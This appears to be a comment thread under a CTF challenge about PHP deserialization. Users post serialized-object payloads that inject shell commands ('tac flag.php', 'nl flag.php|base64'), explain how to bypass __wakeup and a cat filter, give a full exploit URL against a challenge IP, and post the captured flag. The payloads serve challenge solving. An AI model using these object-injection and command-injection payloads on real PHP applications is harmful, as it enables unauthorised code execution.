https://blog.csdn.net/m0_57954651/article/details/127866733
O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
nl flag.php|base64
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}
flag{Unser1alize_and_2CE_Add}
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
特别要注意下url编码的问题
...
评论
18956160518 1月前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
EtHat 4月前
举报
O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
xht0525 6月前
举报
nl flag.php|base64
不会编程的崽 6月前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 6月前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 10月前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
wxy1343 10月前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}
wxy1343 10月前
举报
flag{Unser1alize_and_2CE_Add}
yuanyipaceandlove 11月前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
15683956189 1年前
举报
特别要注意下url编码的问题